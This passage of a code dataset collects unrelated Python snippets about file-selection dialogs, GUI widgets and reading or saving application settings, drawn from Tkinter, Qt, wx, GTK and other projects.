self.cancel)\n\n self.dialog_selection = deque()\n self.selection_paths = deque()\n\n for disk in self.get_disks():\n self.treeview.insert(\n \"\",\n index=\"end\",\n text=disk,\n image=self.disk_icon,\n )\n\n self.dialog.focus()", "def test_default_path(self):\n options = ControlOptions()\n options.parseOptions([])\n self.assertEqual(options[\"data-path\"], FilePath(b\"/var/lib/flocker\"))", "def __call__(self):\n\n (width_offset, height_offset)=self.get_offset(self.dialog)\n self.dialog.geometry(f\"+{width_offset}+{height_offset}\")\n self.dialog.update_idletasks()\n self.dialog.deiconify()\n\n self.dialog.wait_window()\n\n for i, path in enumerate(self.dialog_selection):\n if self.unix_delimiter:\n self.dialog_selection[i] = sub(\"\\\\\\\\\", \"/\", path)\n else:\n self.dialog_selection[i] = sub(\"/\", \"\\\\\\\\\", path)\n\n\n if self.stdout:\n [print(item) for item in self.dialog_selection]\n\n return list(self.dialog_selection)", "def askopenfilename():\n\n file_opt = options = {}\n options['defaultextension'] = '.*'\n options['initialdir'] = 'User\\\\'\n options['initialfile'] = ''\n options['parent'] = root\n options['title'] = 'choose file'\n options['multiple'] = 1\n\n # get filename\n filename = tk.filedialog.askopenfilename(**file_opt)\n\n if filename:\n self.sourcefile = filename\n if len(filename) is 1:\n file_path_var.set(filename)\n else:\n file_path_var.set(\n \"Multiple files, including {}\".format(filename[0]))", "def __init__(self, dialog_title='', dialog_format='',\n start_dir=os.path.expanduser('~/'),\n icon_size=(12, 20), minimal_width=200,\n browse_label='Browse', on_open=None,\n reload_button=True, reload_label='Reload',\n recent_files=None, directory_aliases=None,\n allow_empty=True, empty_file_label='(none)'):\n super().__init__()\n self.dialog_title = dialog_title\n self.dialog_format = dialog_format\n self.start_dir = start_dir\n\n # Recent files should also contain `empty_file_label` so\n # when (none) is selected this is stored in settings.\n self.recent_files = recent_files if recent_files is not None else []\n self.directory_aliases = directory_aliases or {}\n self.allow_empty = allow_empty\n self.file_combo = None\n self.empty_file_label = empty_file_label\n if self.empty_file_label not in self.recent_files \\\n and (self.allow_empty or not self.recent_files):\n self.recent_files.append(self.empty_file_label)\n\n self.check_existence()\n self.on_open.connect(on_open)\n\n layout = QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n\n if recent_files is not None:\n self.file_combo = QComboBox()\n self.file_combo.setMinimumWidth(minimal_width)\n self.file_combo.activated[int].connect(self.select)\n self.update_combo()\n layout.addWidget(self.file_combo)\n\n self.browse_button = QPushButton(browse_label)\n self.browse_button.setFocusPolicy(Qt.NoFocus)\n self.browse_button.clicked.connect(self.browse)\n self.browse_button.setIcon(self.style()\n .standardIcon(QStyle.SP_DirOpenIcon))\n self.browse_button.setIconSize(QSize(*icon_size))\n self.browse_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n layout.addWidget(self.browse_button)\n\n if reload_button:\n self.reload_button = QPushButton(reload_label)\n self.reload_button.setFocusPolicy(Qt.NoFocus)\n self.reload_button.clicked.connect(self.reload)\n self.reload_button.setIcon(self.style()\n .standardIcon(QStyle.SP_BrowserReload))\n self.reload_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.reload_button.setIconSize(QSize(*icon_size))\n layout.addWidget(self.reload_button)", "def askOpenFileName(parent, title, wc, remember =- 1, filetype = None):\n\tasklist = []\n\tif remember == -1:\n\t\tconf = Configuration.getConfiguration()\n\t\tremember = conf.getConfigItem(\"RememberPath\", \"Paths\")\n\tlastpath = \"\"\n\tftype = wc.split(\"|\")[1]\n\tftype = ftype.split(\".\")[1]\n\tif filetype != None:\n\t\tftype = filetype\n\tif remember:\n\t\tlastpath = conf.getConfigItem(\"LastPath_%s\" % ftype, \"Paths\")\n\t\tif not lastpath:\n\t\t\tlastpath = \".\"\n\tdlg = wx.FileDialog(parent, title, lastpath, wildcard = wc, style = wx.OPEN|wx.MULTIPLE)\n\tif dlg.ShowModal() == wx.ID_OK:\n\t\tasklist = dlg.GetPaths()\n\t\tasklist = map(unicode, asklist)\n\t\tif not asklist:\n\t\t\treturn asklist\n\t\tif remember:\n\t\t\tfilepath = os.path.dirname(asklist[0])\n\t\t\tconf.setConfigItem(\"LastPath_%s\" % ftype, \"Paths\", filepath)\n\t\t\n\tdlg.Destroy() \n\treturn asklist", "def configure(prompt_list):\n darwin_vers = int(os.uname()[2].split('.')[0])\n edited_prefs = {}\n for (key, prompt) in prompt_list:\n newvalue = get_input_with_default('%15s: ' % prompt, pref(key))\n if darwin_vers == 10:\n # old behavior in SL: hitting return gives you an empty string,\n # and means accept the default value.\n edited_prefs[key] = newvalue or pref(key) or ''\n else:\n # just use the edited value as-is\n edited_prefs[key] = newvalue\n\n if FOUNDATION_SUPPORT:\n for key, value in edited_prefs.items():\n try:\n CFPreferencesSetAppValue(key, value, BUNDLE_ID)\n except BaseException:\n print('Could not save configuration!', file=sys.stderr)\n raise ConfigurationSaveError\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n CFPreferencesSetAppValue('repo_path', None, BUNDLE_ID)\n CFPreferencesAppSynchronize(BUNDLE_ID)\n\n else:\n try:\n existing_prefs = readPlist(PREFSPATH)\n existing_prefs.update(edited_prefs)\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n if 'repo_path' in existing_prefs:\n del existing_prefs['repo_path']\n writePlist(existing_prefs, PREFSPATH)\n except (IOError, OSError, ExpatError):\n print('Could not save configuration to %s' % PREFSPATH,\n file=sys.stderr)\n raise ConfigurationSaveError", "def __init__(self, parent):\n QtGui.QDialog.__init__(self, parent)\n self.parent = parent\n self.ui = Ui_FileSelectDialog()\n self.ui.setupUi(self)\n mneRoot = os.environ.get('MNE_ROOT', '')\n if mneRoot == \"\":\n mneRoot = self.settings.value(\"MNE_ROOT\", \"\").toString()\n self.ui.lineEditMneRoot.setText(mneRoot)\n self.show()", "def readConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getOpenFileName( self, \"Read application config file\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.readConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def choose_file(self):\n pass", "def readOptions(self):\n get = command_line.CommandLineParser().get_option\n if get('nosplash')!=None:\n self.temp_configuration.showSplash = bool(get('nosplash'))\n if get('debugsignals')!=None:\n self.temp_configuration.debugSignals = bool(get('debugsignals'))\n if get('dotVistrails')!=None:\n self.temp_configuration.dotVistrails = get('dotVistrails')\n #in theory this should never happen because core.configuration.default()\n #should have done this already\n #if not self.configuration.check('dotVistrails'):\n # self.configuration.dotVistrails = system.default_dot_vistrails()\n # self.temp_configuration.dotVistrails = system.default_dot_vistrails()\n if get('multiheads')!=None:\n self.temp_configuration.multiHeads = bool(get('multiheads'))\n if get('maximized')!=None:\n self.temp_configuration.maximizeWindows = bool(get('maximized'))\n if get('movies')!=None:\n self.temp_configuration.showMovies = bool(get('movies'))\n if get('cache')!=None:\n self.temp_configuration.useCache = bool(get('cache'))\n if get('verbose')!=None:\n self.temp_configuration.verbosenessLevel = get('verbose')\n if get('noninteractive')!=None:\n self.temp_configuration.interactiveMode = \\\n not bool(get('noninteractive'))\n if get('workflowinfo') != None:\n self.temp_configuration.workflowInfo = str(get('workflowinfo'))\n if get('dumpcells') != None:\n self.temp_configuration.spreadsheetDumpCells = get('dumpcells')\n if get('pdf') != None:\n self.temp_configuration.spreadsheetDumpPDF = get('pdf')\n if get('workflowgraph') != None:\n self.temp_configuration.workflowGraph = str(get('workflowgraph'))\n if get('evolutiongraph') != None:\n self.temp_configuration.evolutionGraph = str(get('evolutiongraph'))\n if get('executeworkflows') != None:\n self.temp_configuration.executeWorkflows = \\\n bool(get('executeworkflows'))\n if get('showspreadsheetonly') != None:\n self.temp_configuration.showSpreadsheetOnly = \\\n bool(get('showspreadsheetonly'))\n # asking to show only the spreadsheet will force the workflows to\n # be executed\n if get('reviewmode') != None:\n self.temp_configuration.reviewMode = bool(get('reviewmode'))\n\n if self.temp_configuration.showSpreadsheetOnly and not self.temp_configuration.reviewMode:\n self.temp_configuration.executeWorkflows = True\n \n self.temp_db_options = InstanceObject(host=get('host'),\n port=get('port'),\n db=get('db'),\n user=get('user'),\n parameters=get('parameters')\n )\n if get('nologger')!=None:\n self.temp_configuration.nologger = bool(get('nologger'))\n if get('quickstart') != None:\n self.temp_configuration.staticRegistry = str(get('quickstart'))\n if get('detachHistoryView')!= None:\n self.temp_configuration.detachHistoryView = bool(get('detachHistoryView'))\n self.input = command_line.CommandLineParser().positional_arguments()", "def __init__(self):\n\n self.builder = Gtk.Builder()\n self.builder.add_from_file(\"google_client.glade\")\n self.builder.connect_signals(self)\n window = self.builder.get_object(\"global_window\")\n\n #self.bashrcpath = os.path.expanduser('~') + \"/\" + \".bashrc\"\n cwd_dir = os.getcwd()\n self.filepath = os.listdir(path='.')\n self.treeview = self.builder.get_object(\"treeview\")\n self.store = Gtk.ListStore(str, str)\n\n #self.loadPaths()\n \n window.connect(\"destroy\", Gtk.main_quit)\n \n window.show_all()\n Gtk.main()\n\n\n #Drive API AUTHENTICATION\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n #To clear login cache, just delete the file, and on the next execution you will\n #be required to authenticate again (Allow access to Google Drive)\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n\n # If there are no (valid) credentials available, require the user to log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('drive', 'v3', credentials=creds) #We are using V3 API\n\n # the label we use to show the selection\n label = Gtk.Label()\n label.set_text(\"\")\n\n #Trying handlers approach\n handlers = {\n \"on_list_clicked\": listFiles(10),\n \"on_men_destroy\": Gtk.main_quit\n }\n\n \n #Listing files\n def listFiles(size):\n results = service.files().list(\n pageSize= size, fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n\n #Check if there exists files to be loaded\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id'])) #List the files\n #listFiles(10)\n\n #Uploading files (from local directory)\n def uploadFile(filename,filepath,mimetype):\n file_metadata = {'name': filename}\n media = MediaFileUpload(filepath,\n mimetype=mimetype)\n file = service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: %s' % file.get('id'))\n \n uploadFile('google.jpg', 'google.jpg', 'image/jpeg')\n\n\n #Downloading files (We dont do this now)\n def downloadFile(file_id,filepath):\n request = service.files().get_media(fileId=file_id)\n fh = io.BytesIO()\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print(\"Download %d%%.\" % int(status.progress() * 100))\n with io.open(filepath,'wb') as f:\n fh.seek(0)\n f.write(fh.read())\n\n #Creating a folder\n def createFolder(name):\n file_metadata = {\n 'name': name,\n 'mimeType': 'application/vnd.google-apps.folder'\n }\n file = service.files().create(body=file_metadata,\n fields='id').execute()\n print ('Folder ID: %s' % file.get('id'))\n #createFolder(\"Lunodzo\")\n\n #Search query (Within directory)\n def searchFile(size,query):\n results = service.files().list(\n pageSize=size,fields=\"nextPageToken, files(id, name, kind, mimeType)\",q=query).execute()\n items = results.get('files', [])\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(item)\n print('{0} ({1})'.format(item['name'], item['id']))\n #searchFile(10,\"name contains 'Getting'\")", "def fileDialog(*args, application: bool=True, defaultFileName: AnyStr=\"\", directoryMask:\n AnyStr=\"\", mode: int=0, title: AnyStr=\"\", **kwargs)->AnyStr:\n pass", "def __init__(self):\r\n\r\n super().__init__() # Loading the Tk window instance\r\n\r\n self.title(\"Song Storage\") # Naming the root window\r\n self.resizable(False, False) # Disabling resizing of the root window\r\n self.iconphoto(True, PhotoImage(file=\"Resources/Icons/AppIcon.png\")) # Loading the icon of the application\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n # Application's GUI was invoked from a CLI instance; updating the configuration file variable\r\n if config_var['RUN-MODE']['run_mode'] == \"1\":\r\n config_var.set('RUN-MODE', 'run_mode', \"0\")\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_gui:\r\n config_var.write(configfile_gui) # Writing the changes to the configuration file\r\n configfile_gui.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n # The variable that shows the current run-mode of the application\r\n # It is used by the radiobuttons in the filemenu\r\n self.gui_menu_var = StringVar(self, config_var['RUN-MODE']['run_mode'])\r\n \r\n \"\"\"Declaring the variables the GUI will use\"\"\"\r\n self.menubar = Menu() # The file menu where the user can specify global settings for the application\r\n self.filemenu = Menu(self.menubar, tearoff=0) # Submenu for the file menu\r\n self.runmode_menu = Menu(self.filemenu, tearoff=0) # Submenu showing the current run-mode of the application\r\n \r\n self.folder_frame = Frame() # The frame that will display the current media folder\r\n\r\n # The value that stores the current media folder's path as a string\r\n self.var = StringVar(self, \"Please choose the folder where you'd like to store your media:\")\r\n\r\n # The label that will display the current media folder\r\n self.media_folder_label = Label(self.folder_frame, textvariable=self.var)\r\n\r\n # This button will prompt the user to select a media folder\r\n self.folder_button = Button(self.folder_frame, text=\"Browse...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The button that allows the user to change the currently selected media folder\r\n self.change_folder_button = ttk.Button(self.folder_frame, text=\"Change...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The frame that will display all the media content available inside the media folder\r\n self.media_frame = Frame()\r\n self.canvas = Canvas()\r\n\r\n self.path_frame_parent = Frame(self.media_frame, relief=GROOVE, width=500, height=100, bd=1)\r\n\r\n # Variables related to the search frame of the application\r\n self.search_frame = Frame()\r\n\r\n self.back_image = PhotoImage(file=\"Resources/Icons/Back Icon #2.png\")\r\n self.back_button = Button(self.search_frame, image=self.back_image, bg=\"#ffffff\", command=self.display_media)\r\n\r\n self.search_entry = ttk.Entry(self.search_frame, width=50)\r\n self.search_button = ttk.Button(self.search_frame, text=\"Search\",\r\n command=lambda entry=self.search_entry: self.search(self.search_entry))\r\n # self.advanced_search_button = ttk.Button(self.search_frame, text=\"Advanced Search...\")\r\n\r\n self.header = Label(self.media_frame, text=\"Available media:\")\r\n\r\n # This label will display when the user attempts to add an already-existent media file\r\n self.already_exists = Label(self.folder_frame, text=\"\")\r\n\r\n self.button_frame = Frame()\r\n\r\n # The button that allows the user to add media files from other sources\r\n self.add_music_button = ttk.Button(self.button_frame, text=\"Add Media...\", command=self.add_media_dialog)\r\n\r\n # Savelist-related variables\r\n self.create_savelist_button = ttk.Button(self.button_frame, text=\"Create Savelist...\",\r\n command=self.create_savelist)\r\n\r\n self.quit_button = ttk.Button(self.button_frame, text=\"Exit\", command=self.destroy)\r\n\r\n self.archive_name = StringVar()\r\n self.archive_name.set(\"\")\r\n\r\n # We are storing the length of the longest item in the media list in order to be able to modify the size of the\r\n # scrollable area (if necessary).\r\n self.longest_item_length = 0\r\n\r\n self.library_items = [] # The array storing info for every media file (name, buttons, metadata etc.)\r\n\r\n self.process_widgets()\r\n\r\n self.load_interface()\r\n\r\n self.lift()\r\n\r\n print(\"Graphical user interface loaded.\")", "def on_open_file(self):\n return tkFileDialog.askopenfilename(\n filetypes=[('default', '*.txt'), ('All files', '*.*')])", "def action(self):\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\" or self.filename is None:\n return\n\n dirname = fs.path.forcedir(\".\")\n if self.wparm is not None:\n dirname = self.selected_dir\n if dirname.startswith(self.active_url):\n filename = \"{}{}\".format(fs.path.forcedir(self.active_url), self.filename)\n else:\n # We can't use fs.path.join and also not fs.path.abspath because of protocol url\n filename = \"{}{}{}\".format(\n fs.path.forcedir(self.active_url),\n fs.path.forcedir(dirname),\n self.filename,\n )\n filename = filename.replace(fs.path.forcedir(\".\"), \"\")\n if self.show_save_action and not self.show_dirs_only:\n self.save_settings()\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\":\n return\n info = self.get_info(fs.path.split(filename)[1], namespaces=None)\n if info is not None and info.is_dir:\n sel = QtWidgets.QMessageBox.warning(\n self,\n \"Warning\",\n \"You can't create a file with this name: {0}\".format(self.filename),\n QtWidgets.QMessageBox.No,\n )\n elif info is not None and info.is_file:\n sel = QtWidgets.QMessageBox.question(\n self,\n \"Replace Filename\",\n \"This will replace the filename: {0}. Continue?\".format(\n self.filename\n ),\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n )\n if sel == QtWidgets.QMessageBox.Yes:\n self.filename = filename\n self.close()\n else:\n pass\n else:\n self.filename = filename\n self.close()\n else:\n self.filename = filename\n self.close()", "def __init__(self, parent=None):\n super(E5PathPicker, self).__init__(parent, useLineEdit=True)", "def _GclStyleSettings(self):\n settings = {\n 'port': self.GetCodeReviewSetting('TRYSERVER_HTTP_PORT'),\n 'host': self.GetCodeReviewSetting('TRYSERVER_HTTP_HOST'),\n 'svn_repo': self.GetCodeReviewSetting('TRYSERVER_SVN_URL'),\n 'gerrit_url': self.GetCodeReviewSetting('TRYSERVER_GERRIT_URL'),\n 'git_repo': self.GetCodeReviewSetting('TRYSERVER_GIT_URL'),\n 'project': self.GetCodeReviewSetting('TRYSERVER_PROJECT'),\n # Primarily for revision=auto\n 'revision': self.GetCodeReviewSetting('TRYSERVER_REVISION'),\n 'root': self.GetCodeReviewSetting('TRYSERVER_ROOT'),\n 'patchlevel': self.GetCodeReviewSetting('TRYSERVER_PATCHLEVEL'),\n }\n logging.info('\\n'.join(['%s: %s' % (k, v)\n for (k, v) in settings.iteritems() if v]))\n for (k, v) in settings.iteritems():\n # Avoid overwriting options already set using command line flags.\n if v and getattr(self.options, k) is None:\n setattr(self.options, k, v)", "def folder_selector(folder_path=None, gui_instance=None):\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n if gui_instance is not None: # The method has been fired by a GUI widget\r\n folder = filedialog.askdirectory() # We will use an OS-specific dialog box call to select the media folder\r\n\r\n if folder != \"\": # Checks to see if the user has canceled the operation\r\n config_var.set('MEDIA FOLDER', 'folder', folder) # Updating the value inside the configuration file\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_folder:\r\n config_var.write(configfile_folder) # Writing the changes to the configuration file\r\n configfile_folder.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n return False\r\n\r\n gui_instance.display_media_folder() # Updating the media list\r\n\r\n gui_instance.folder_scan()\r\n\r\n else: # The method has been fired by using CLI\r\n if not os.path.exists(folder_path): # The user has specified an invalid folder\r\n print(\"\\nError: The specified directory does not exist.\")\r\n return False\r\n\r\n config_var.set('MEDIA FOLDER', 'folder', folder_path) # Updating the value inside the configuration file\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_folder:\r\n config_var.write(configfile_folder) # Writing the changes to the configuration file\r\n configfile_folder.close()\r\n\r\n except IOError:\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n return False\r\n\r\n print(\"\\nMedia folder updated.\")\r\n\r\n return True", "def change_exteditor(self):\r\n path, valid = QInputDialog.getText(self, self.tr('External editor'),\r\n self.tr('External editor executable path:'),\r\n QLineEdit.Normal,\r\n CONF.get(self.ID, 'external_editor/path'))\r\n if valid:\r\n CONF.set(self.ID, 'external_editor/path', unicode(path))", "def openFileDialog(self): \n self.dialog = ocempgui.widgets.Box(373, 372)\n self.dialog.topleft = 528, 205\n\n background = guiobjects.OcempImageMapTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(WINDOW_UPLOAD))\n self.dialog.add_child(background)\n \n self.listDir = guiobjects.OcempImageFileList(310, 239)\n self.listDir.topleft = 31, 60\n self.dialog.add_child(self.listDir)\n\n buttonOK = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK), self.buttonTooltips[\"ok\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonOK.topleft = [233, 308]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"OK\")\n self.dialog.add_child(buttonOK)\n \n buttonCancel = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL), self.buttonTooltips[\"cancel\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonCancel.topleft = [122, 308]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"KO\")\n self.dialog.add_child(buttonCancel)\n\n self.window.add_child (self.dialog)", "def GetCodereviewSettingsInteractively():\n server = settings.GetServer(error_ok=True)\n prompt = 'Rietveld server (host[:port])'\n prompt += ' [%s]' % (server or DEFAULT_SERVER)\n newserver = raw_input(prompt + ': ')\n if not server and not newserver:\n newserver = DEFAULT_SERVER\n if newserver and newserver != server:\n cl_settings.RunGit(['config', 'rietveld.server', newserver])\n\n tracker_server = settings.GetTrackerServer(error_ok=True)\n prompt = 'Allura server'\n prompt += ' [%s]' % tracker_server\n newtracker = raw_input(prompt + ': ')\n while not tracker_server and not newtracker:\n prompt = 'You must provide the address of the Allura tracker server: '\n newtracker = raw_input(prompt)\n if newtracker and newtracker != tracker_server:\n cl_settings.RunGit(['config', 'allura.tracker', newtracker])\n\n token = settings.GetToken(error_ok=True)\n prompt = 'Allura bearer token (see https://sourceforge.net/auth/oauth/)'\n prompt += ' [%s]' % token\n newtoken = raw_input(prompt + ': ')\n while not token and not newtoken:\n prompt = 'You must provide a bearer token to authenticate: '\n newtoken = raw_input(prompt)\n if newtoken and newtoken != token:\n cl_settings.RunGit(['config', 'allura.token', newtoken])\n\n def SetProperty(initial, caption, name):\n prompt = caption\n if initial:\n prompt += ' (\"x\" to clear) [%s]' % initial\n new_val = raw_input(prompt + ': ')\n if new_val == 'x':\n cl_settings.RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)\n elif new_val and new_val != initial:\n cl_settings.RunGit(['config', 'rietveld.' + name, new_val])\n\n SetProperty(settings.GetCCList(), 'CC list', 'cc')", "def svn_client_propset(char_propname, svn_string_t_propval, char_target, svn_boolean_t_recurse, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def gen_common_parser() -> optparse.OptionParser:\n parser = optparse.OptionParser()\n parser.add_option(\"--prefs\", dest=\"file_path\")\n return parser", "def on_open(self):\n\n ftypes = [('CSV', '.csv'), ('JSON', '.json'), ('All files', '*')]\n dlg = filedialog.Open(self, filetypes=ftypes)\n\n absolute_file_path = dlg.show()\n \n if absolute_file_path:\n # extract the file name from the absolute path\n file_name = absolute_file_path.split('/')[len(absolute_file_path.split('/')) - 1]\n \n # update the label text\n self.selected_file_name.configure(text=file_name)\n\n self.__set_full_path_of_file(absolute_file_path)\n else:\n # update the label text\n self.selected_file_name.configure(text=\"<Selected file name>\")\n\n self.__set_full_path_of_file(None)", "def onLoadCSVList(self, evt):\n dlg = wx.FileDialog(self.view, \"Choose a file:\", wildcard = \"*.txt; *.csv\" ,\n style=wx.FD_DEFAULT_STYLE | wx.FD_CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n print \"You chose %s\" % dlg.GetPath()\n self.config.CSVFilePath = dlg.GetPath()", "def beaker_session_options(self):\n\n session_data_dir = os.path.join(self.APP_DIR, self.SESSION_DIR)\n\n # TODO: Options which should be made into PyWy application options\n options = dict(type='file',\n data_dir=session_data_dir,\n auto=True)\n\n # Standard options\n options.update(invalidate_corrupt=True, timeout=None,\n secret=None, log_file=None,)\n\n return options", "def browse_file_dialog():\n root = Tkinter.Tk()\n # Make window almost invisible to focus it and ensure directory browser\n # doesn't end up loading in the background behind main window.\n root.withdraw()\n root.overrideredirect(True)\n root.geometry('0x0+0+0')\n root.deiconify()\n root.lift()\n root.focus_force()\n root.update()\n file_path = tkFileDialog.askopenfilename()\n root.destroy()\n if file_path:\n return os.path.normpath(file_path)\n else:\n return file_path", "def _get_wipe_selector(editable_property):\n # Preset luma\n combo_box = gtk.combo_box_new_text()\n \n # Get options\n keys = mlttransitions.wipe_lumas.keys()\n # translate here\n keys.sort()\n for k in keys:\n combo_box.append_text(k)\n \n # Set initial value\n k_index = -1\n tokens = editable_property.value.split(\"/\")\n test_value = tokens[len(tokens) - 1]\n for k,v in mlttransitions.wipe_lumas.iteritems():\n if v == test_value:\n k_index = keys.index(k)\n \n combo_box.set_active(k_index)\n preset_luma_row = _get_two_column_editor_row(editable_property.get_display_name(), combo_box)\n \n # User luma\n use_preset_luma_combo = gtk.combo_box_new_text()\n use_preset_luma_combo.append_text(_(\"Preset Luma\"))\n use_preset_luma_combo.append_text(_(\"User Luma\"))\n \n dialog = gtk.FileChooserDialog(_(\"Select Luma File\"), None, \n gtk.FILE_CHOOSER_ACTION_OPEN, \n (_(\"Cancel\").encode('utf-8'), gtk.RESPONSE_REJECT,\n _(\"OK\").encode('utf-8'), gtk.RESPONSE_ACCEPT), None)\n dialog.set_action(gtk.FILE_CHOOSER_ACTION_OPEN)\n dialog.set_select_multiple(False)\n file_filter = gtk.FileFilter()\n file_filter.add_pattern(\"*.png\")\n file_filter.add_pattern(\"*.pgm\")\n file_filter.set_name(_(\"Wipe Luma files\"))\n dialog.add_filter(file_filter)\n \n user_luma_select = gtk.FileChooserButton(dialog)\n user_luma_select.set_size_request(210, 28)\n \n user_luma_label = gtk.Label(_(\"Luma File:\"))\n\n if k_index == -1:\n use_preset_luma_combo.set_active(1)\n combo_box.set_sensitive(False)\n combo_box.set_active(0)\n user_luma_select.set_filename(editable_property.value)\n else:\n use_preset_luma_combo.set_active(0)\n user_luma_select.set_sensitive(False)\n user_luma_label.set_sensitive(False)\n \n user_luma_row = gtk.HBox(False, 2)\n user_luma_row.pack_start(use_preset_luma_combo, False, False, 0)\n user_luma_row.pack_start(gtk.Label(), True, True, 0)\n user_luma_row.pack_start(user_luma_label, False, False, 2)\n user_luma_row.pack_start(user_luma_select, False, False, 0)\n\n editor_pane = gtk.VBox(False)\n editor_pane.pack_start(preset_luma_row, False, False, 4)\n editor_pane.pack_start(user_luma_row, False, False, 4)\n\n widgets = (combo_box, use_preset_luma_combo, user_luma_select, user_luma_label, keys)\n \n combo_box.connect(\"changed\", editable_property.combo_selection_changed, keys)\n use_preset_luma_combo.connect(\"changed\", _wipe_preset_combo_changed, editable_property, widgets)\n dialog.connect('response', _wipe_lumafile_dialog_response, editable_property, widgets)\n \n return editor_pane", "def toolPropertyWindow(*args, field: Union[AnyStr, bool]=\"\", helpButton: Union[AnyStr, bool]=\"\",\n icon: Union[AnyStr, bool]=\"\", inMainWindow: bool=True, location:\n Union[AnyStr, bool]=\"\", noviceMode: bool=True, resetButton: Union[AnyStr,\n bool]=\"\", restore: bool=True, selectCommand: Union[AnyStr, bool]=\"\",\n showCommand: Union[AnyStr, bool]=\"\", q=True, query=True, e=True,\n edit=True, **kwargs)->Union[None, Any]:\n pass", "def saveConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getSaveFileName( self, \"Save Full Config As...\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.saveConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def askopenfilename(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n 